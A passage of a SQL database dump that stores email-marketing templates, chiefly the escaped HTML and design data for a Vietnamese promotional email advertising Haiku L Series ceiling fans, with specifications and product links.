\\"u_row_7\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"UkkBWxvzv8\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"otIuyp2NLU\\\",\\\"contents\\\":[{\\\"id\\\":\\\"3YxPW0zruG\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#ffffff\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_11\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\">Too many emails?\\u00a0<a rel=\\\\\\\"noopener\\\\\\\" href=\\\\\\\"https:\\/\\/hogiaphat.vn\\/lien-he\\\\\\\" target=\\\\\\\"_blank\\\\\\\" data-u-link-value=\\\\\\\"eyJuYW1lIjoid2ViIiwiYXR0cnMiOnsiaHJlZiI6Int7aHJlZn19IiwidGFyZ2V0Ijoie3t0YXJnZXR9fSJ9LCJ2YWx1ZXMiOnsiaHJlZiI6Imh0dHBzOi8vaG9naWFwaGF0LnZuL2xpZW4taGUiLCJ0YXJnZXQiOiJfYmxhbmsifX0=\\\\\\\"> <span style=\\\\\\\"text-decoration: underline; font-size: 14px; line-height: 19.6px;\\\\\\\">Unsubscribe<\\/span><\\/a><\\/p>\\\",\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_7\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#a47e6b\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_6\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}}],\\\"values\\\":{\\\"popupPosition\\\":\\\"center\\\",\\\"popupWidth\\\":\\\"600px\\\",\\\"popupHeight\\\":\\\"auto\\\",\\\"borderRadius\\\":\\\"10px\\\",\\\"contentAlign\\\":\\\"center\\\",\\\"contentVerticalAlign\\\":\\\"center\\\",\\\"contentWidth\\\":\\\"600px\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Arial\\\",\\\"value\\\":\\\"arial,helvetica,sans-serif\\\"},\\\"textColor\\\":\\\"#000000\\\",\\\"popupBackgroundColor\\\":\\\"#FFFFFF\\\",\\\"popupBackgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"cover\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"popupOverlay_backgroundColor\\\":\\\"rgba(0, 0, 0, 0.1)\\\",\\\"popupCloseButton_position\\\":\\\"top-right\\\",\\\"popupCloseButton_backgroundColor\\\":\\\"#DDDDDD\\\",\\\"popupCloseButton_iconColor\\\":\\\"#000000\\\",\\\"popupCloseButton_borderRadius\\\":\\\"0px\\\",\\\"popupCloseButton_margin\\\":\\\"0px\\\",\\\"popupCloseButton_action\\\":{\\\"name\\\":\\\"close_popup\\\",\\\"attrs\\\":{\\\"onClick\\\":\\\"document.querySelector(\'.u-popup-container\').style.display = \'none\';\\\"}},\\\"backgroundColor\\\":\\\"#e1d0c6\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"preheaderText\\\":\\\"\\\",\\\"linkStyle\\\":{\\\"body\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_body\\\",\\\"htmlClassNames\\\":\\\"u_body\\\"}}},\\\"schemaVersion\\\":12}\"', '', 1, '2023-03-04 16:30:23');
INSERT INTO `tblma_email_templates` (`id`, `name`, `color`, `category`, `published`, `language`, `data_html`, `data_design`, `description`, `addedfrom`, `dateadded`) VALUES
(12, 'Haiku L Series', '', 0, 1, 'english', '\"<!DOCTYPE HTML PUBLIC \\\"-\\/\\/W3C\\/\\/DTD XHTML 1.0 Transitional \\/\\/EN\\\" \\\"http:\\/\\/www.w3.org\\/TR\\/xhtml1\\/DTD\\/xhtml1-transitional.dtd\\\">\\r\\n<html xmlns=\\\"http:\\/\\/www.w3.org\\/1999\\/xhtml\\\" xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:o=\\\"urn:schemas-microsoft-com:office:office\\\">\\r\\n<head>\\r\\n<!--[if gte mso 9]>\\r\\n<xml>\\r\\n  <o:OfficeDocumentSettings>\\r\\n    <o:AllowPNG\\/>\\r\\n    <o:PixelsPerInch>96<\\/o:PixelsPerInch>\\r\\n  <\\/o:OfficeDocumentSettings>\\r\\n<\\/xml>\\r\\n<![endif]-->\\r\\n  <meta http-equiv=\\\"Content-Type\\\" content=\\\"text\\/html; charset=UTF-8\\\">\\r\\n  <meta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\">\\r\\n  <meta name=\\\"x-apple-disable-message-reformatting\\\">\\r\\n  <!--[if !mso]><!--><meta http-equiv=\\\"X-UA-Compatible\\\" content=\\\"IE=edge\\\"><!--<![endif]-->\\r\\n  <title><\\/title>\\r\\n  \\r\\n    <style type=\\\"text\\/css\\\">\\r\\n      @media only screen and (min-width: 620px) {\\r\\n  .u-row {\\r\\n    width: 600px !important;\\r\\n  }\\r\\n  .u-row .u-col {\\r\\n    vertical-align: top;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-100 {\\r\\n    width: 600px !important;\\r\\n  }\\r\\n\\r\\n}\\r\\n\\r\\n@media (max-width: 620px) {\\r\\n  .u-row-container {\\r\\n    max-width: 100% !important;\\r\\n    padding-left: 0px !important;\\r\\n    padding-right: 0px !important;\\r\\n  }\\r\\n  .u-row .u-col {\\r\\n    min-width: 320px !important;\\r\\n    max-width: 100% !important;\\r\\n    display: block !important;\\r\\n  }\\r\\n  .u-row {\\r\\n    width: 100% !important;\\r\\n  }\\r\\n  .u-col {\\r\\n    width: 100% !important;\\r\\n  }\\r\\n  .u-col > div {\\r\\n    margin: 0 auto;\\r\\n  }\\r\\n}\\r\\na[x-apple-data-detectors=\'true\'] {\\r\\n  color: inherit !important;\\r\\n  text-decoration: none !important;\\r\\n}\\r\\n\\r\\n@media (max-width: 480px) {\\r\\n  .hide-mobile {\\r\\n    max-height: 0px;\\r\\n    overflow: hidden;\\r\\n    display: none !important;\\r\\n  }\\r\\n}\\r\\n\\r\\n<\\/style>\\r\\n  \\r\\n  \\r\\n\\r\\n<!--[if !mso]><!--><link href=\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Cabin:400,700\\\" rel=\\\"stylesheet\\\" type=\\\"text\\/css\\\"><link href=\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Open+Sans:400,700\\\" rel=\\\"stylesheet\\\" type=\\\"text\\/css\\\"><link href=\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Lato:400,700\\\" rel=\\\"stylesheet\\\" type=\\\"text\\/css\\\"><!--<![endif]-->\\r\\n\\r\\n<\\/head>\\r\\n\\r\\n<body class=\\\"clean-body u_body\\\" style=\\\"margin: 0;padding: 0;-webkit-text-size-adjust: 100%;background-color: #236fa1;color: #000000\\\">\\r\\n  <!--[if IE]><div class=\\\"ie-container\\\"><![endif]-->\\r\\n  <!--[if mso]><div class=\\\"mso-container\\\"><![endif]-->\\r\\n  <table style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;min-width: 320px;Margin: 0 auto;background-color: #236fa1;width:100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\">\\r\\n  <tbody>\\r\\n  <tr style=\\\"vertical-align: top\\\">\\r\\n    <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n    <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td align=\\\"center\\\" style=\\\"background-color: #236fa1;\\\"><![endif]-->\\r\\n    \\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"background-color: #236fa1;width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"background-color: #236fa1;height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:15px 10px 5px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677922239248-log_hq.png\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 580px;\\\" width=\\\"580\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:0px 10px 15px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"color: #ffffff; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\">NH\\u00c0 CUNG C\\u1ea4P \\u1ee6Y QUY\\u1ec0N CH\\u00cdNH H\\u00c3NG HAIKU - BIG ASS FANS T\\u1ea0I VI\\u1ec6T NAM<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #ecf0f1;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-image: url(\'https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1612262724776-H.png\');background-repeat: no-repeat;background-position: center top;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-image: url(\'https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1612262724776-H.png\');background-repeat: no-repeat;background-position: center top;background-color: #ecf0f1;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1678340400926-haiku_head.jpg\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 580px;\\\" width=\\\"580\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:25px 10px 10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"color: #a47e6b; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-family: Cabin, sans-serif; line-height: 28px; font-size: 20px;\\\"><span style=\\\"line-height: 28px;\\\">\\\"Haiku L mang \\u0111\\u1ebfn s\\u1ef1 tho\\u1ea3i m\\u00e1i v\\u1edbi s\\u1ef1 ho\\u00e0n h\\u1ea3o s\\u1ef1 im l\\u1eb7ng v\\u00e0 m\\u1ed9t ki\\u1ec3u d\\u00e1ng \\u0111\\u1eb9p, thi\\u1ebft k\\u1ebf c\\u1ed5 \\u0111i\\u1ec3n.\\\"<\\/span><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"color: #292828; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 140%; text-align: left;\\\"><span style=\\\"font-family: inherit; line-height: 19.6px;\\\">+ B\\u1ea3o h\\u00e0nh: 03 n\\u0103m; \\u0111i\\u1ec1u ki\\u1ec7n l\\u1eafp \\u0111\\u1eb7t trong nh\\u00e0 BH 05 n\\u0103m<\\/span><\\/p>\\r\\n<p style=\\\"line-height: 140%; text-align: left;\\\"><span style=\\\"font-family: inherit; line-height: 19.6px;\\\">+ Di\\u1ec7n t\\u00edch l\\u00e0m m\\u00e1t: 52-inch: 15\\u2019 x 15\\u2019<\\/span><\\/p>\\r\\n<p style=\\\"line-height: 140%; text-align: left;\\\"><span style=\\\"font-family: inherit; line-height: 19.6px;\\\">+ \\u0110i\\u1ec1u khi\\u1ec3n t\\u1eeb xa: \\u0111i k\\u00e8m, tu\\u1ef3 ch\\u1ecdn th\\u00eam \\u0111i\\u1ec1u khi\\u1ec3n g\\u1eafn t\\u01b0\\u1eddng<\\/span><\\/p>\\r\\n<p style=\\\"line-height: 140%; text-align: left;\\\"><span style=\\\"font-family: inherit; line-height: 19.6px;\\\">+ T\\u1ed1c \\u0111\\u1ed9: 7 c\\u1ea5p<\\/span><\\/p>\\r\\n<p style=\\\"line-height: 140%; text-align: left;\\\"><span style=\\\"font-family: inherit; line-height: 19.6px;\\\">+ B\\u1ed9 \\u0111\\u00e8n: tu\\u1ef3 ch\\u1ecdn th\\u00eam \\u0111\\u00e8n LED 16 dimmable<\\/span><\\/p>\\r\\n<p style=\\\"line-height: 140%; text-align: left;\\\"><span style=\\\"font-family: inherit; line-height: 19.6px;\\\">+ M\\u00f3c treo qu\\u1ea1t: Universal, l\\u1eafp \\u0111\\u1eb7t tr\\u1ea7n nghi\\u00eang 33 \\u0111\\u1ed9<\\/span><\\/p>\\r\\n<p style=\\\"line-height: 140%;\\\">* <span style=\\\"font-size: 8px; line-height: 11.2px;\\\">HAIKU L ch\\u01b0a bao g\\u1ed3m M\\u00f4-\\u0111un Wi-Fi \\u0111\\u1ec3 k\\u1ebft n\\u1ed1i \\u0111i\\u1ec1u khi\\u1ec3n APP (iOS\\/Android). H\\u00e3y li\\u00ean h\\u1ec7 b\\u00e1n h\\u00e0ng \\u0111\\u1ec3 t\\u01b0 v\\u1ea5n th\\u00eam<\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<div class=\\\"menu\\\" style=\\\"text-align:center\\\">\\r\\n<!--[if (mso)|(IE)]><table role=\\\"presentation\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" align=\\\"center\\\"><tr><![endif]-->\\r\\n\\r\\n  <!--[if (mso)|(IE)]><td style=\\\"padding:5px 15px\\\"><![endif]-->\\r\\n  \\r\\n    <a href=\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-haiku-h\\\" target=\\\"_self\\\" style=\\\"padding:5px 15px;display:inline-block;color:#0068A5;font-family:\'Lato\',sans-serif;font-size:14px;text-decoration:none\\\" >\\r\\n      Haiku Indoor\\r\\n    <\\/a>\\r\\n  \\r\\n  <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n  \\r\\n    <!--[if (mso)|(IE)]><td style=\\\"padding:5px 15px\\\"><![endif]-->\\r\\n    <span style=\\\"padding:5px 15px;display:inline-block;color:#444444;font-family:\'Lato\',sans-serif;font-size:14px;\\\" class=\\\"hide-mobile\\\">\\r\\n      |\\r\\n    <\\/span>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n  \\r\\n\\r\\n  <!--[if (mso)|(IE)]><td style=\\\"padding:5px 15px\\\"><![endif]-->\\r\\n  \\r\\n    <a href=\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-ngoai-troi\\\" target=\\\"_self\\\" style=\\\"padding:5px 15px;display:inline-block;color:#0068A5;font-family:\'Lato\',sans-serif;font-size:14px;text-decoration:none\\\" >\\r\\n      Haiku Outdoor\\r\\n    <\\/a>\\r\\n  \\r\\n  <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n  \\r\\n    <!--[if (mso)|(IE)]><td style=\\\"padding:5px 15px\\\"><![endif]-->\\r\\n    <span style=\\\"padding:5px 15px;display:inline-block;color:#444444;font-family:\'Lato\',sans-serif;font-size:14px;\\\" class=\\\"hide-mobile\\\">\\r\\n      |\\r\\n    <\\/span>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n  \\r\\n\\r\\n  <!--[if (mso)|(IE)]><td style=\\\"padding:5px 15px\\\"><![endif]-->\\r\\n  \\r\\n    <a href=\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-haiku-i\\\" target=\\\"_self\\\" style=\\\"padding:5px 15px;display:inline-block;color:#0068A5;font-family:\'Lato\',sans-serif;font-size:14px;text-decoration:none\\\" >\\r\\n      Haiku I series\\r\\n    <\\/a>\\r\\n  \\r\\n  <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n  \\r\\n    <!--[if (mso)|(IE)]><td style=\\\"padding:5px 15px\\\"><![endif]-->\\r\\n    <span style=\\\"padding:5px 15px;display:inline-block;color:#444444;font-family:\'Lato\',sans-serif;font-size:14px;\\\" class=\\\"hide-mobile\\\">\\r\\n      |\\r\\n    <\\/span>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n  \\r\\n\\r\\n  <!--[if (mso)|(IE)]><td style=\\\"padding:5px 15px\\\"><![endif]-->\\r\\n  \\r\\n    <a href=\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-haiku-l\\\" target=\\\"_self\\\" style=\\\"padding:5px 15px;display:inline-block;color:#0068A5;font-family:\'Lato\',sans-serif;font-size:14px;text-decoration:none\\\" >\\r\\n      Haiku L Series\\r\\n    <\\/a>\\r\\n  \\r\\n  <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n  \\r\\n\\r\\n<!--[if (mso)|(IE)]><\\/tr><\\/table><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:15px 10px 25px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div align=\\\"center\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-haiku\\\" style=\\\"height:37px; v-text-anchor:middle; width:145px;\\\" arcsize=\\\"2.5%\\\"  strokecolor=\\\"#CCC\\\" strokeweight=\\\"1px\\\" fillcolor=\\\"#ffffff\\\"><w:anchorlock\\/><center style=\\\"color:#a87f6b;font-family:\'Open Sans\',sans-serif;\\\"><![endif]-->  \\r\\n    <a href=\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-haiku\\\" target=\\\"_blank\\\" style=\\\"box-sizing: border-box;display: inline-block;font-family:\'Open Sans\',sans-serif;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #a87f6b; background-color: #ffffff; border-radius: 1px;-webkit-border-radius: 1px; -moz-border-radius: 1px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;border-top-color: #CCC; border-top-style: solid; border-top-width: 1px; border-left-color: #CCC; border-left-style: solid; border-left-width: 1px; border-right-color: #CCC; border-right-style: solid; border-right-width: 1px; border-bottom-color: #CCC; border-bottom-style: solid; border-bottom-width: 1px;font-size: 14px;\\\">\\r\\n      <span style=\\\"display:block;padding:10px 20px;line-height:120%;\\\"><strong><span style=\\\"line-height: 16.8px;\\\">T\\u00ccM HI\\u1ec2U TH\\u00caM<\\/span><\\/strong><\\/span>\\r\\n    <\\/a>\\r\\n  <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1678340442333-mau-sau-haiku-L.jpg\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 580px;\\\" width=\\\"580\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if 